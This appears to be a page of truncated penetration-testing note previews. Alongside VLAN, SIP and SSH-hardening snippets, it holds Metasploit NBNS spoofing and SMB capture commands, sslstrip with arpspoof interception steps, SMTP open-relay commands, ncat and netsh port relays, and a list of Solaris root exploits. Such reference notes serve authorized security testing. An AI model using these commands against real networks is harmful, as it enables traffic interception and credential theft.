Configure an Ethernet interface as a VLAN trunk
---------------------------------------------------
Suppose that a host requires access to two VLANs, both carried by a trunk connected to physical interface eth0. The assigned IP addresses for the host are 192.168.2.1/24 on VLAN 2 and 192.168.3.1/24 on VLAN 3.
[+] First install the vlan packag...
Score: 0
VOIP (SIP) Cheatsheet
--------------------------------
SIP usually uses ports 5060 TCP or UDP for unencrypted signaling or 5061 for encrypted transportation using TLS.
SIP is an ASCII based protocol which has some similar elements like in the HTTP protocol by using a Request/Response model. Much like an HTTP request from a browser a SIP clie...
Score: 0
Useful commands
---------------
[+] Remove text using sed
cat SSL_Hosts.txt | sed -r 's/\ttcp\t/:/g'
[+] Port forwarding using NCAT
ncat -lvkp 12345 -c "ncat --ssl 192.168.0.1 443"
[+] Windows 7 or later, build port relay
C:\> netsh interface portproxy add v4tov4 listenport=<LPORT> listenaddress=0.0.0...
Score: 0
Browser Addons
--------------
- Chrome:
Recx Security Analyser
Wappalyzer
- Firefox/Iceweasel:
Web Developer
Tamper Data
FoxyProxy Standard
User Agent Switcher
PassiveRecon
Wappalyzer
Firebug
HackBar...
Score: 0
[+] Solaris vulnerabilities:
Solaris 7:
sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl
**ttyprompt TELNET - buffer overflow in solaris login - manual through telnet client
sendmail_exec LPD - line printer daemon buffer overflow - allows root
heap_noir ...
Score: 0
1) Flip your machine into forwarding mode (as root):
echo "1" > /proc/sys/net/ipv4/ip_forward
2) Setup iptables to intercept HTTP requests (as root):
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
3) sslstip.py -l 8080 -f lock.ico
4) Run arpspoof to redirect traffic to your machine (as...
Score: 0
[+] SMTP Open Relay Commands
[-] ncat -C 86.54.23.178 25
[-] HELO mail.co.uk
[-] MAIL FROM: <user@mail.co.uk>
[-] RCPT TO: <test@email.com>
[-] DATA
Test Email...
Score: 0
[+] Weak SSH Ciphers
sudo nano /etc/ssh/sshd_config
Add the following lines:
Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,arcfour
MACs hmac-sha1,hmac-ripemd160
Restart SSH
[+] Unquoted Service Paths
Run Regedit and browse to HKLM\SYSTEM\CurrentControlSet\services
Find the service in question and simply add &...
Score: 0
[+] NBNS Spoof / Capture
[>] NBNS Spoof
msf > use auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > show options
msf auxiliary(nbns_response) > set INTERFACE eth0
msf auxiliary(nbns_response) > set SPOOFIP 10.10.10.10
msf auxiliary(nbns_response) > run
[>] SMB Capture
msf > use auxiliary/server/...
Score: 0
1. NBTSCAN
root@bt:~# nbtscan -r 10.0.2.0/24
Doing NBT name scan for addresses from 10.0.2.0/24
IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
10.0.2.0 Sendto failed: Permission denied
10.0.2.10 <unknown> ...
Score: 0